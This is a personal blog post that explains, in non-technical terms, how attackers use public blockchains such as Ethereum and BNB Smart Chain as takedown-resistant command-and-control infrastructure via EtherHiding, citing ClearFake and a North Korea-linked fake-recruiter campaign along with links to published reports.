A Decentralized Center for Control: The Blockchain as a C2

Blockchain has been a fascination of mine for several years now. I first learned about it back in 2021, in the middle of the crypto boom that took over Twitter with NFTs and meme coins. I did not see it as a way to make a quick buck like so many others did. What caught my attention was the potential of the technology itself and the wider applications it could have.

Lately though, I have been seeing some news that introduced me to a new way to view the blockchain. Attackers have started to use the blockchain as a place to hide and run their command and control infrastructure. So let me walk you through what that means and why it should matter to you.

The Current Landscape

Ever since ChatGPT entered the technological landscape, many crypto fanatics, also known as “crypto bros”, moved on to the next shiny thing, AI. This left blockchain technology to fade into the background. To be honest, it was already overlooked as a serious piece of technology even during its peak, buried under all the hype around rug pulls, Elon Musk’s weird endorsements, and Coffeezilla’s exposure of Logan Paul’s scam coin cryptozoo.

But the technology never went away. And in recent months we have seen a handful of cybersecurity incidents that use the blockchain itself as an attack vector. Not to steal coins or drain wallets, which is what most people would expect, but to hide malicious code in a place that is almost impossible to take down.

To understand why that is such a big deal, we first need to talk about what a C2 actually is.

What is a C2?

C2 is short for command and control. When an attacker compromises a machine, whether it is a laptop, a server, or a phone, they usually need a way to keep interacting with it for usually not so good reasons. They need to send it new commands, tell it what to steal, and collect whatever data comes back. This is what a C2 is, a place where attackers can control infected devices.

You can think of it like a remote control for every machine an attacker has broken into. The infected machine reaches out to the C2, asks “what do you want me to do”, and the C2 answers. This back and forth is the heartbeat of most modern attacks. Without it, a piece of malware sitting on your computer is mostly stuck doing whatever it was told to do at the start and nothing more.

The Problem With Traditional C2

There is a bit of a caveat however… the C2 has to live somewhere. Traditionally it lives on a server with an IP address, or behind an url. However, anything with an address can be found, and anything that can be found can be taken away.

When defenders discover a C2 server, they can do a few things. They can ask the hosting provider to shut it down. They can get the domain registrar to seize the domain. They can add the IP address and domain to block lists so that no machine on a protected network can reach it. Law enforcement can even seize the physical hardware in some cases.

In other words, traditional C2 has a single point of failure. Pull the plug on the server or take the domain, and the attacker loses contact with everything they worked so hard to infect. This is a real weakness, and attackers have spent years trying to work around it with tricks like rapidly changing domains and bulletproof hosting. None of those tricks fully solve the problem though, because at the end of the day there is still someone you can call to take it down.

So what if there was no one to call?

Enter the Blockchain

This is where the blockchain comes in.

A public blockchain like Ethereum or BNB Smart Chain has a few properties that happen to be perfect for an attacker who wants a C2 that cannot be killed. It is decentralized, which means the data is copied across thousands of computers all over the world with no central owner. It is immutable, which means that once something is written to it, no one can quietly delete it, not the developers, not a court, and not law enforcement. And it is open, which means anyone can read from it at any time.

Now flip those properties around and look at them from a defender’s point of view. There is no hosting provider to email. There is no domain to seize. There is no single machine to unplug. The malicious data lives on the same network that powers apps used by millions of honest people. You cannot take down Ethereum to stop one attacker any more than you can shut off the internet to stop one website.

That is the core idea. The blockchain gives attackers a place to store instructions that is always online, anonymous to publish to, and nearly impossible to remove.

EtherHiding

The technique that brings this idea to life is known as EtherHiding. It was first documented by a team at Guardio Labs back in October of 2023.

Here is how it works in plain terms. Attackers first compromise a normal website, more often than not, a WordPress site, and inject a small piece of JavaScript into it. That small piece of code does not contain the actual attack. Instead, it reaches out to a smart contract on the blockchain and asks it for the next stage of the payload. The contract hands back the malicious code, and the victim’s browser runs it.

The clever part is in the details. Reading data from a smart contract can be done with a simple call that costs no gas and creates no transaction. That means an attacker can pull their payload thousands of times without leaving an obvious trail on the chain. When they want to change what the malware does, they send one cheap transaction to update the contract, and every compromised site instantly starts serving the new code. The reported cost for one of these updates is somewhere between a quarter and a dollar and a half.

In the original campaign, known as ClearFake, this was used to show visitors a fake browser update warning. If you clicked it, you ended up with an information stealer such as Lumma or RedLine sitting on your machine, quietly collecting your passwords and crypto wallets. The same approach has since spread, with one group tracked as UNC5142 reported to have compromised around fourteen thousand WordPress sites using this method.

You can read the original reporting and some follow up coverage here:

• https://thehackernews.com/2023/10/binances-smart-chain-exploited-in-new.html
• https://www.bleepingcomputer.com/news/security/hackers-use-binance-smart-chain-contracts-to-store-malicious-scripts/

When Nation States Take Notice

A technique being used by financially motivated criminals is one thing. A technique being adopted by a government is another thing entirely. In October of 2025, the Google Threat Intelligence Group reported that they had been tracking a North Korea linked group, which they label UNC5342, using EtherHiding since February of that same year. As far as anyone can tell, this was the first time a nation state actor picked up the technique at scale.

Their campaign is worth describing because it shows how social engineering and blockchain abuse fit together. The attackers approach software developers on LinkedIn while pretending to be recruiters. They move the conversation over to Telegram or Discord, then ask the target to run some code as part of a fake job assessment. That code uses EtherHiding to pull malware called JADESNOW from the blockchain, which then loads a JavaScript version of a tool called INVISIBLEFERRET. The end goal in many cases was simple. Steal the developer’s data and drain their cryptocurrency.

Google’s full writeup is here:

• https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding

There is also a good summary of how this turns the blockchain into what some have started to call an unkillable C2:

• https://www.endorlabs.com/learn/the-unkillable-c2-how-attackers-are-moving-command-and-control-to-the-blockchain

Why This Is So Hard to Stop

By now the problem should be clear. The usual playbook for shutting down an attacker’s infrastructure simply does not apply here. You cannot seize the contract. You cannot take down the chain. The data is going to stay there for as long as the blockchain itself exists.

That does not mean defenders are helpless, but it does mean the fight has to move somewhere else. Instead of removing the C2, the focus shifts to the two ends of the attack. On one end, you clean up and protect the websites that get compromised in the first place, since the malicious JavaScript still has to be injected somewhere. On the other end, you protect the actual machine, catching the malware when it tries to run no matter where it came from. The thing you cannot do anymore is the one thing that used to work best, which was pulling the plug at the source.

It is also worth pointing out that this puts the people who run blockchains in an awkward spot. The same property that makes a chain trustworthy, the fact that no single party can change or remove data, is exactly the property the attackers are leaning on.

Closing Thoughts

When I first got into blockchain in 2021, I was drawn to the idea that you could build systems no single person controls. I’m still drawn to the core philosophy and idea behind it. But powerful ideas rarely come with a label telling you how they will be used. The very thing that makes a blockchain resistant to censorship and seizure is the same thing that makes it such a comfortable home for an attacker who never wants their C2 to go down.

I do not think this is a reason to be afraid of the technology, and it is certainly not a reason to write it off. It is a reminder that every tool we build can be turned in a direction we did not intend, and that the people defending these systems have to think just as creatively as the people attacking them.

If you made it this far, thank you for reading. If this kind of thing interests you, I would encourage you to read through the reports I linked above, since the technical details are far richer than what I could fit here. And the next time someone tells you the blockchain is just a way to get rich quick, you will know there is a stranger and more serious story hiding underneath.